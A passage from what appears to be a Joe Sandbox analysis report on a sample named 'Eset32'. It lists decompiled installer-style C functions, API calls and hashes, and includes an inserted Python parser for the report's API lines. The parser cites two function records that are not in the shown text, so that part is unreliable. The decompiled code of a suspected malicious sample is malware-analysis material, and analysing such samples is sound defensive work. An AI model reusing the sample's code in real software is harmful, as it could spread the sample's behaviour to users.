                                                          • Opcode ID: c08e85f7896b9a4561d683b23b3b2dae21a167d845191f4bc040fadce0444681
                                                          • Instruction ID: 1e980c0bf3dfe1ee8e8c0bbb525d6a304c4f3a3ada6f962fb42c7dde8bd75a6e
                                                          • Opcode Fuzzy Hash: c08e85f7896b9a4561d683b23b3b2dae21a167d845191f4bc040fadce0444681
                                                          • Instruction Fuzzy Hash: C6215771900108BBEF129F90CE89EEE7A7DEF44344F100076FA55B11E0E7B48E54AA68
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%
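The "APIs" lines in each function record above (E004027DF, E00402CD0) share one fixed shape: a bullet, `Api.MODULE`, an optional parenthesised argument list in which unresolved values are `?`, and a `ref:` address. The following parser is an added example for consuming such records programmatically and is not part of the Joe Sandbox report or its tooling; the line format is inferred from the records on this page, the sample lines are copied from the two records above, and the list of "destructive" APIs is an assumed watchlist chosen for illustration.

```python
"""Parse the per-function "APIs" lines of a Joe Sandbox disassembly listing.

Added example, not part of the Joe Sandbox report. The line format is inferred
from the report text; the sample lines below are copied from the E004027DF and
E00402CD0 records on the page.
"""
import re
from collections import defaultdict

# Constructed sample input: the API lines of the two function records above.
SAMPLE_API_LINES = """\
• GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,?,?,?,000000F0), ref: 00402833
• GlobalAlloc.KERNEL32(00000040,?,00000000,?,?,?,?,?,000000F0), ref: 0040284F
• GlobalFree.KERNEL32 ref: 0040288E
• GlobalFree.KERNEL32 ref: 004028A1
• CloseHandle.KERNEL32(?,?,?,?,000000F0), ref: 004028B9
• DeleteFileA.KERNEL32(?,00000000,40000000,00000002,00000000,00000000,?,?,?,000000F0), ref: 004028CD
• RegEnumValueA.ADVAPI32 ref: 00402D24
• RegEnumKeyA.ADVAPI32(?,00000000,?,00000105), ref: 00402D70
• RegCloseKey.ADVAPI32(?,?,?), ref: 00402D79
• RegDeleteKeyA.ADVAPI32(?,?), ref: 00402D90
• RegCloseKey.ADVAPI32(?,?,?), ref: 00402D9B
"""

# One API line: "• Api.MODULE(arg,arg,...), ref: ADDR" or "• Api.MODULE ref: ADDR".
API_LINE = re.compile(
    r"^\s*•\s*(?P<api>\w+)\.(?P<module>\w+)"     # GlobalAlloc.KERNEL32
    r"(?:\((?P<args>[^)]*)\))?"                  # optional "(00000040,?,...)"
    r",?\s*ref:\s*(?P<ref>[0-9A-Fa-f]{8})\s*$"   # ref: 00402833
)

# Assumed watchlist (not from the report): APIs that remove files or registry keys.
DESTRUCTIVE_APIS = {
    "DeleteFileA", "DeleteFileW",
    "RegDeleteKeyA", "RegDeleteKeyW", "RegDeleteKeyExA", "RegDeleteKeyExW",
    "RegDeleteValueA", "RegDeleteValueW",
}


def parse_api_lines(text):
    """Return one dict per API line: api, module, args (strings, '?' kept), ref (int).

    Lines that do not match the pattern are skipped rather than raising, so a
    whole report can be fed through without pre-filtering.
    """
    calls = []
    for line in text.splitlines():
        m = API_LINE.match(line)
        if not m:
            continue
        args = m.group("args")
        calls.append({
            "api": m.group("api"),
            "module": m.group("module"),
            "args": args.split(",") if args else [],
            "ref": int(m.group("ref"), 16),
        })
    return calls


def arg_value(arg):
    """Decode one argument cell: hex string -> int, '?' (unresolved) -> None."""
    return None if arg.strip() == "?" else int(arg, 16)


def apis_by_module(calls):
    """Map module name -> sorted list of distinct API names called from it."""
    grouped = defaultdict(set)
    for c in calls:
        grouped[c["module"]].add(c["api"])
    return {mod: sorted(apis) for mod, apis in grouped.items()}


def destructive_calls(calls):
    """Sorted (api, ref) pairs for calls on the DESTRUCTIVE_APIS watchlist."""
    return sorted({(c["api"], c["ref"]) for c in calls if c["api"] in DESTRUCTIVE_APIS})


if __name__ == "__main__":
    parsed = parse_api_lines(SAMPLE_API_LINES)
    for mod, apis in sorted(apis_by_module(parsed).items()):
        print(f"{mod}: {', '.join(apis)}")
    for api, ref in destructive_calls(parsed):
        print(f"destructive: {api} at 0x{ref:08x}")
```

The `ref` address is what you would use to jump back into the listing: for the sample above the two destructive calls resolve to 0x004028CD (DeleteFileA, the cleanup path in E004027DF) and 0x00402D90 (RegDeleteKeyA in E00402CD0). Arguments shown as `?` are values the sandbox could not recover, so `arg_value` returns None for them instead of guessing.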

                                                          C-Code - Quality: 77%
                                                          			E00401D65(void* __ebx, void* __edx) {
                                                          				struct HWND__* _t30;
                                                          				CHAR* _t38;
                                                          				void* _t48;
                                                          				void* _t53;
                                                          				signed int _t55;
                                                          				signed int _t58;
                                                          				long _t61;
                                                          				void* _t65;
                                                          
                                                          				_t53 = __ebx;
                                                          				if(( *(_t65 - 0x1b) & 0x00000001) == 0) {
                                                          					_t30 = GetDlgItem( *(_t65 - 8),  *(_t65 - 0x20));
                                                          				} else {
                                                          					E00402BAC(2);
                                                          					 *((intOrPtr*)(__ebp - 0x38)) = __edx;
                                                          				}
                                                          				_t55 =  *(_t65 - 0x1c);
                                                          				 *(_t65 + 8) = _t30;
                                                          				_t58 = _t55 & 0x00000004;
                                                          				 *(_t65 - 0xc) = _t55 & 0x00000003;
                                                          				 *(_t65 - 0x34) = _t55 >> 0x1f;
                                                          				 *(_t65 - 0x30) = _t55 >> 0x0000001e & 0x00000001;
                                                          				if((_t55 & 0x00010000) == 0) {
                                                          					_t38 =  *(_t65 - 0x24) & 0x0000ffff;
                                                          				} else {
                                                          					_t38 = E00402BCE(0x11);
                                                          				}
                                                          				 *(_t65 - 8) = _t38;
                                                          				GetClientRect( *(_t65 + 8), _t65 - 0x84);
                                                          				asm("sbb edi, edi");
                                                          				_t61 = LoadImageA( ~_t58 &  *0x42f420,  *(_t65 - 8),  *(_t65 - 0xc),  *(_t65 - 0x7c) *  *(_t65 - 0x34),  *(_t65 - 0x78) *  *(_t65 - 0x30),  *(_t65 - 0x1c) & 0x0000fef0);
                                                          				_t48 = SendMessageA( *(_t65 + 8), 0x172,  *(_t65 - 0xc), _t61);
                                                          				if(_t48 != _t53 &&  *(_t65 - 0xc) == _t53) {
                                                          					DeleteObject(_t48);
                                                          				}
                                                          				if( *((intOrPtr*)(_t65 - 0x28)) >= _t53) {
                                                          					_push(_t61);
                                                          					E00406055();
                                                          				}
                                                          				 *0x42f4c8 =  *0x42f4c8 +  *((intOrPtr*)(_t65 - 4));
                                                          				return 0;
                                                          			}


                                                          Instruction addresses for E00401D65 (the per-line alignment with the C code above was lost in extraction):
                                                          0x00401d65 0x00401d69 0x00401d7e 0x00401d6b 0x00401d6d 0x00401d73 0x00401d73 0x00401d84 0x00401d87 0x00401d91 0x00401d94 0x00401d9c 0x00401dad 0x00401db0 0x00401dbb 0x00401db2 0x00401db4 0x00401db4 0x00401dbf 0x00401dcc 0x00401df3 0x00401e02 0x00401e10 0x00401e18 0x00401e20 0x00401e20 0x00401e29 0x00401e2f 0x004029a5 0x004029a5 0x00402a5d 0x00402a69

                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.429947309.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.429940533.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.429957755.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.429962678.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.430001955.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.430014747.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.430021999.0000000000438000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_Eset32.jbxd
                                                          Similarity
                                                          • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                          • String ID:
                                                          • API String ID: 1849352358-0
                                                          • Opcode ID: 64047181dbb11954f6248d6d4ebce6329301936260590e1bb013e11241bca830
                                                          • Instruction ID: ea2313c62ec258575502bac7b5a91221d1b2f7c42d1e166e88532b570a834240
                                                          • Opcode Fuzzy Hash: 64047181dbb11954f6248d6d4ebce6329301936260590e1bb013e11241bca830
                                                          • Instruction Fuzzy Hash: 02212872A00109AFCB15DFA4DD85AAEBBB5EB48300F24417EF905F62A1DB389941DB54
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 73%
                                                          			E00401E35(intOrPtr __edx) {
                                                          				void* __esi;
                                                          				int _t9;
                                                          				signed char _t15;
                                                          				struct HFONT__* _t18;
                                                          				intOrPtr _t30;
                                                          				struct HDC__* _t31;
                                                          				void* _t33;
                                                          				void* _t35;
                                                          
                                                          				_t30 = __edx;
                                                          				_t31 = GetDC( *(_t35 - 8));
                                                          				_t9 = E00402BAC(2);
                                                          				 *((intOrPtr*)(_t35 - 0x38)) = _t30;
                                                          				0x40b838->lfHeight =  ~(MulDiv(_t9, GetDeviceCaps(_t31, 0x5a), 0x48));
                                                          				ReleaseDC( *(_t35 - 8), _t31);
                                                          				 *0x40b848 = E00402BAC(3);
                                                          				_t15 =  *((intOrPtr*)(_t35 - 0x18));
                                                          				 *((intOrPtr*)(_t35 - 0x38)) = _t30;
                                                          				 *0x40b84f = 1;
                                                          				 *0x40b84c = _t15 & 0x00000001;
                                                          				 *0x40b84d = _t15 & 0x00000002;
                                                          				 *0x40b84e = _t15 & 0x00000004;
                                                          				E0040618A(_t9, _t31, _t33, 0x40b854,  *((intOrPtr*)(_t35 - 0x24)));
                                                          				_t18 = CreateFontIndirectA(0x40b838);
                                                          				_push(_t18);
                                                          				_push(_t33);
                                                          				E00406055();
                                                          				 *0x42f4c8 =  *0x42f4c8 +  *((intOrPtr*)(_t35 - 4));
                                                          				return 0;
                                                          			}

                                                          APIs
                                                          • GetDC.USER32(?), ref: 00401E38
                                                          • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401E52
                                                          • MulDiv.KERNEL32(00000000,00000000), ref: 00401E5A
                                                          • ReleaseDC.USER32 ref: 00401E6B
                                                          • CreateFontIndirectA.GDI32(0040B838), ref: 00401EBA
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.429947309.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.429940533.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.429957755.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.429962678.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.430001955.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.430014747.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.430021999.0000000000438000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_Eset32.jbxd
                                                          Similarity
                                                          • API ID: CapsCreateDeviceFontIndirectRelease
                                                          • String ID:
                                                          • API String ID: 3808545654-0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 59%
                                                          			E00401C2E(intOrPtr __edx) {
                                                          				int _t29;
                                                          				long _t30;
                                                          				signed int _t32;
                                                          				CHAR* _t35;
                                                          				long _t36;
                                                          				int _t41;
                                                          				signed int _t42;
                                                          				int _t46;
                                                          				int _t56;
                                                          				intOrPtr _t57;
                                                          				struct HWND__* _t61;
                                                          				void* _t64;
                                                          
                                                          				_t57 = __edx;
                                                          				_t29 = E00402BAC(3);
                                                          				 *((intOrPtr*)(_t64 - 0x38)) = _t57;
                                                          				 *(_t64 - 8) = _t29;
                                                          				_t30 = E00402BAC(4);
                                                          				 *((intOrPtr*)(_t64 - 0x38)) = _t57;
                                                          				 *(_t64 + 8) = _t30;
                                                          				if(( *(_t64 - 0x14) & 0x00000001) != 0) {
                                                          					 *((intOrPtr*)(__ebp - 8)) = E00402BCE(0x33);
                                                          				}
                                                          				__eflags =  *(_t64 - 0x14) & 0x00000002;
                                                          				if(( *(_t64 - 0x14) & 0x00000002) != 0) {
                                                          					 *(_t64 + 8) = E00402BCE(0x44);
                                                          				}
                                                          				__eflags =  *((intOrPtr*)(_t64 - 0x2c)) - 0x21;
                                                          				_push(1);
                                                          				if(__eflags != 0) {
                                                          					_t59 = E00402BCE();
                                                          					_t32 = E00402BCE();
                                                          					asm("sbb ecx, ecx");
                                                          					asm("sbb eax, eax");
                                                          					_t35 =  ~( *_t31) & _t59;
                                                          					__eflags = _t35;
                                                          					_t36 = FindWindowExA( *(_t64 - 8),  *(_t64 + 8), _t35,  ~( *_t32) & _t32);
                                                          					goto L10;
                                                          				} else {
                                                          					_t61 = E00402BAC();
                                                          					 *((intOrPtr*)(_t64 - 0x38)) = _t57;
                                                          					_t41 = E00402BAC(2);
                                                          					 *((intOrPtr*)(_t64 - 0x38)) = _t57;
                                                          					_t56 =  *(_t64 - 0x14) >> 2;
                                                          					if(__eflags == 0) {
                                                          						_t36 = SendMessageA(_t61, _t41,  *(_t64 - 8),  *(_t64 + 8));
                                                          						L10:
                                                          						 *(_t64 - 0xc) = _t36;
                                                          					} else {
                                                          						_t42 = SendMessageTimeoutA(_t61, _t41,  *(_t64 - 8),  *(_t64 + 8), _t46, _t56, _t64 - 0xc);
                                                          						asm("sbb eax, eax");
                                                          						 *((intOrPtr*)(_t64 - 4)) =  ~_t42 + 1;
                                                          					}
                                                          				}
                                                          				__eflags =  *((intOrPtr*)(_t64 - 0x28)) - _t46;
                                                          				if( *((intOrPtr*)(_t64 - 0x28)) >= _t46) {
                                                          					_push( *(_t64 - 0xc));
                                                          					E00406055();
                                                          				}
                                                          				 *0x42f4c8 =  *0x42f4c8 +  *((intOrPtr*)(_t64 - 4));
                                                          				return 0;
                                                          			}

                                                          APIs
                                                          • SendMessageTimeoutA.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C9E
                                                          • SendMessageA.USER32 ref: 00401CB6
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.429947309.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.429940533.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.429957755.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.429962678.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.430001955.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.430014747.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.430021999.0000000000438000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_Eset32.jbxd
                                                          Similarity
                                                          • API ID: MessageSend$Timeout
                                                          • String ID: !
                                                          • API String ID: 1777923405-2657877971
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 77%
                                                          			E004049C4(int _a4, intOrPtr _a8, signed int _a12, signed int _a16) {
                                                          				char _v36;
                                                          				char _v68;
                                                          				void* __ebx;
                                                          				void* __edi;
                                                          				void* __esi;
                                                          				signed int _t21;
                                                          				signed int _t22;
                                                          				void* _t29;
                                                          				void* _t31;
                                                          				void* _t32;
                                                          				void* _t41;
                                                          				signed int _t43;
                                                          				signed int _t47;
                                                          				signed int _t50;
                                                          				signed int _t51;
                                                          				signed int _t53;
                                                          
                                                          				_t21 = _a16;
                                                          				_t51 = _a12;
                                                          				_t41 = 0xffffffdc;
                                                          				if(_t21 == 0) {
                                                          					_push(0x14);
                                                          					_pop(0);
                                                          					_t22 = _t51;
                                                          					if(_t51 < 0x100000) {
                                                          						_push(0xa);
                                                          						_pop(0);
                                                          						_t41 = 0xffffffdd;
                                                          					}
                                                          					if(_t51 < 0x400) {
                                                          						_t41 = 0xffffffde;
                                                          					}
                                                          					if(_t51 < 0xffff3333) {
                                                          						_t50 = 0x14;
                                                          						asm("cdq");
                                                          						_t22 = 1 / _t50 + _t51;
                                                          					}
                                                          					_t23 = _t22 & 0x00ffffff;
                                                          					_t53 = _t22 >> 0;
                                                          					_t43 = 0xa;
                                                          					_t47 = ((_t22 & 0x00ffffff) + _t23 * 4 + (_t22 & 0x00ffffff) + _t23 * 4 >> 0) % _t43;
                                                          				} else {
                                                          					_t53 = (_t21 << 0x00000020 | _t51) >> 0x14;
                                                          					_t47 = 0;
                                                          				}
                                                          				_t29 = E0040618A(_t41, _t47, _t53,  &_v36, 0xffffffdf);
                                                          				_t31 = E0040618A(_t41, _t47, _t53,  &_v68, _t41);
                                                          				_t32 = E0040618A(_t41, _t47, 0x42a890, 0x42a890, _a8);
                                                          				wsprintfA(_t32 + lstrlenA(0x42a890), "%u.%u%s%s", _t53, _t47, _t31, _t29);
                                                          				return SetDlgItemTextA( *0x42ebf8, _a4, 0x42a890);
                                                          			}

                                                          APIs
                                                          • lstrlenA.KERNEL32(0042A890,0042A890,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,004048DF,000000DF,00000000,00000400,?), ref: 00404A62
                                                          • wsprintfA.USER32 ref: 00404A6A
                                                          • SetDlgItemTextA.USER32 ref: 00404A7D
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.429947309.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.429940533.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.429957755.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.429962678.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.430001955.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.430014747.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.430021999.0000000000438000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_Eset32.jbxd
                                                          Similarity
                                                          • API ID: ItemTextlstrlenwsprintf
                                                          • String ID: %u.%u%s%s
                                                          • API String ID: 3540041739-3551169577
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 100%
                                                          			E00405A8F(CHAR* _a4) {
                                                          				CHAR* _t7;
                                                          
                                                          				_t7 = _a4;
                                                          				if( *(CharPrevA(_t7,  &(_t7[lstrlenA(_t7)]))) != 0x5c) {
                                                          					lstrcatA(_t7, 0x40a014);
                                                          				}
                                                          				return _t7;
                                                          			}

                                                          APIs
                                                          • lstrlenA.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,00403335,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040355A,?,00000007,00000009,0000000B), ref: 00405A95
                                                          • CharPrevA.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,00403335,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040355A,?,00000007,00000009,0000000B), ref: 00405A9E
                                                          • lstrcatA.KERNEL32(?,0040A014,?,00000007,00000009,0000000B), ref: 00405AAF
                                                          Strings
                                                          • C:\Users\user\AppData\Local\Temp\, xrefs: 00405A8F
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.429947309.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.429940533.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.429957755.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.429962678.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.430001955.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.430014747.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.430021999.0000000000438000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_Eset32.jbxd
                                                          Similarity
                                                          • API ID: CharPrevlstrcatlstrlen
                                                          • String ID: C:\Users\user\AppData\Local\Temp\
                                                          • API String ID: 2659869361-823278215
                                                          • Opcode ID: 7e3bd0a74015a4b4c7bd8f32b9337ec82444728bd267b6e5413a6877d2367a50
                                                          • Instruction ID: 6078a555604e81c1816c45b3e60b5c3e7c31ed84b02af53c952a19e53ba35867
                                                          • Opcode Fuzzy Hash: 7e3bd0a74015a4b4c7bd8f32b9337ec82444728bd267b6e5413a6877d2367a50
                                                          • Instruction Fuzzy Hash: 68D0A7B26055307AE21126155C06ECB19488F463447060066F500BB193C77C4C114BFD
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 59%
                                                          			E0040209D(void* __ebx, void* __eflags) {
                                                          				void* _t27;
                                                          				struct HINSTANCE__* _t30;
                                                          				CHAR* _t32;
                                                          				intOrPtr* _t33;
                                                          				void* _t34;
                                                          
                                                          				_t27 = __ebx;
                                                          				asm("sbb eax, 0x42f4f8");
                                                          				 *(_t34 - 4) = 1;
                                                          				if(__eflags < 0) {
                                                          					_push(0xffffffe7);
                                                          					L15:
                                                          					E00401423();
                                                          					L16:
                                                          					 *0x42f4c8 =  *0x42f4c8 +  *(_t34 - 4);
                                                          					return 0;
                                                          				}
                                                          				_t32 = E00402BCE(0xfffffff0);
                                                          				 *(_t34 + 8) = E00402BCE(1);
                                                          				if( *((intOrPtr*)(_t34 - 0x18)) == __ebx) {
                                                          					L3:
                                                          					_t30 = LoadLibraryExA(_t32, _t27, 8);
                                                          					if(_t30 == _t27) {
                                                          						_push(0xfffffff6);
                                                          						goto L15;
                                                          					}
                                                          					L4:
                                                          					_t33 = GetProcAddress(_t30,  *(_t34 + 8));
                                                          					if(_t33 == _t27) {
                                                          						E0040521E(0xfffffff7,  *(_t34 + 8));
                                                          					} else {
                                                          						 *(_t34 - 4) = _t27;
                                                          						if( *((intOrPtr*)(_t34 - 0x20)) == _t27) {
                                                          							 *_t33( *((intOrPtr*)(_t34 - 8)), 0x400, 0x430000, 0x40b878, 0x40a000);
                                                          						} else {
                                                          							E00401423( *((intOrPtr*)(_t34 - 0x20)));
                                                          							if( *_t33() != 0) {
                                                          								 *(_t34 - 4) = 1;
                                                          							}
                                                          						}
                                                          					}
                                                          					if( *((intOrPtr*)(_t34 - 0x1c)) == _t27 && E004038AA(_t30) != 0) {
                                                          						FreeLibrary(_t30);
                                                          					}
                                                          					goto L16;
                                                          				}
                                                          				_t30 = GetModuleHandleA(_t32);
                                                          				if(_t30 != __ebx) {
                                                          					goto L4;
                                                          				}
                                                          				goto L3;
                                                          			}









                                                          APIs
                                                          • GetModuleHandleA.KERNEL32(00000000,00000001,000000F0), ref: 004020C8
                                                            • Part of subcall function 0040521E: lstrlenA.KERNEL32(0042A070,00000000,00428145,76DDEA30,?,?,?,?,?,?,?,?,?,00403233,00000000,?), ref: 00405257
                                                            • Part of subcall function 0040521E: lstrlenA.KERNEL32(00403233,0042A070,00000000,00428145,76DDEA30,?,?,?,?,?,?,?,?,?,00403233,00000000), ref: 00405267
                                                            • Part of subcall function 0040521E: lstrcatA.KERNEL32(0042A070,00403233,00403233,0042A070,00000000,00428145,76DDEA30), ref: 0040527A
                                                            • Part of subcall function 0040521E: SetWindowTextA.USER32(0042A070,0042A070), ref: 0040528C
                                                            • Part of subcall function 0040521E: SendMessageA.USER32 ref: 004052B2
                                                            • Part of subcall function 0040521E: SendMessageA.USER32 ref: 004052CC
                                                            • Part of subcall function 0040521E: SendMessageA.USER32 ref: 004052DA
                                                          • LoadLibraryExA.KERNEL32(00000000,?,00000008,00000001,000000F0), ref: 004020D8
                                                          • GetProcAddress.KERNEL32(00000000,?), ref: 004020E8
                                                          • FreeLibrary.KERNEL32(00000000,00000000,000000F7,?,?,00000008,00000001,000000F0), ref: 00402152
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.429947309.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.429940533.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.429957755.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.429962678.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.430001955.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.430014747.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.430021999.0000000000438000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_Eset32.jbxd
                                                          Similarity
                                                          • API ID: MessageSend$Librarylstrlen$AddressFreeHandleLoadModuleProcTextWindowlstrcat
                                                          • String ID:
                                                          • API String ID: 2987980305-0
                                                          • Opcode ID: cbbca793592133c54db2e53d3555cb6bc9ab1f80129fbdab1f6ba1bcbb37dc43
                                                          • Instruction ID: f7200b9d034bcb950a45a2beb12b39e5fe5f048be62c56950c98b25cd9e943c1
                                                          • Opcode Fuzzy Hash: cbbca793592133c54db2e53d3555cb6bc9ab1f80129fbdab1f6ba1bcbb37dc43
                                                          • Instruction Fuzzy Hash: 7A21C932600115EBCF207FA58F49A5F76B1AF14359F20423BF651B61D1CABC89829A5E
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 100%
                                                          			E00402E3D(intOrPtr _a4) {
                                                          				long _t2;
                                                          				struct HWND__* _t3;
                                                          				struct HWND__* _t6;
                                                          
                                                          				if(_a4 == 0) {
                                                          					__eflags =  *0x429448; // 0x0
                                                          					if(__eflags == 0) {
                                                          						_t2 = GetTickCount();
                                                          						__eflags = _t2 -  *0x42f430;
                                                          						if(_t2 >  *0x42f430) {
                                                          							_t3 = CreateDialogParamA( *0x42f420, 0x6f, 0, E00402DBA, 0);
                                                          							 *0x429448 = _t3;
                                                          							return ShowWindow(_t3, 5);
                                                          						}
                                                          						return _t2;
                                                          					} else {
                                                          						return E0040653C(0);
                                                          					}
                                                          				} else {
                                                          					_t6 =  *0x429448; // 0x0
                                                          					if(_t6 != 0) {
                                                          						_t6 = DestroyWindow(_t6);
                                                          					}
                                                          					 *0x429448 = 0;
                                                          					return _t6;
                                                          				}
                                                          			}







                                                          APIs
                                                          • DestroyWindow.USER32(00000000,00000000,0040301B,00000001), ref: 00402E50
                                                          • GetTickCount.KERNEL32 ref: 00402E6E
                                                          • CreateDialogParamA.USER32(0000006F,00000000,00402DBA,00000000), ref: 00402E8B
                                                          • ShowWindow.USER32(00000000,00000005), ref: 00402E99
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.429947309.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.429940533.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.429957755.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.429962678.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.430001955.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.430014747.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.430021999.0000000000438000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_Eset32.jbxd
                                                          Similarity
                                                          • API ID: Window$CountCreateDestroyDialogParamShowTick
                                                          • String ID:
                                                          • API String ID: 2102729457-0
                                                          • Opcode ID: 8c1e1bd8efa9ab411d4161537fee885c8283498bc89c51da2617a800704498c9
                                                          • Instruction ID: cc5f9dcce599e9be0c1e5b41ef6f72156ec830c1ee92694e4cf82ced2ffe4824
                                                          • Opcode Fuzzy Hash: 8c1e1bd8efa9ab411d4161537fee885c8283498bc89c51da2617a800704498c9
                                                          • Instruction Fuzzy Hash: B6F05E30A45630EBC6317B64FE4CA8B7B64BB44B45B91047AF045B22E8C6740C83CBED
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 53%
                                                          			E00405B7D(void* __eflags, intOrPtr _a4) {
                                                          				int _t11;
                                                          				signed char* _t12;
                                                          				intOrPtr _t18;
                                                          				intOrPtr* _t21;
                                                          				void* _t22;
                                                          
                                                          				E004060F7(0x42bc98, _a4);
                                                          				_t21 = E00405B28(0x42bc98);
                                                          				if(_t21 != 0) {
                                                          					E004063D2(_t21);
                                                          					if(( *0x42f43c & 0x00000080) == 0) {
                                                          						L5:
                                                          						_t22 = _t21 - 0x42bc98;
                                                          						while(1) {
                                                          							_t11 = lstrlenA(0x42bc98);
                                                          							_push(0x42bc98);
                                                          							if(_t11 <= _t22) {
                                                          								break;
                                                          							}
                                                          							_t12 = E0040646B();
                                                          							if(_t12 == 0 || ( *_t12 & 0x00000010) != 0) {
                                                          								E00405AD6(0x42bc98);
                                                          								continue;
                                                          							} else {
                                                          								goto L1;
                                                          							}
                                                          						}
                                                          						E00405A8F();
                                                          						return 0 | GetFileAttributesA(??) != 0xffffffff;
                                                          					}
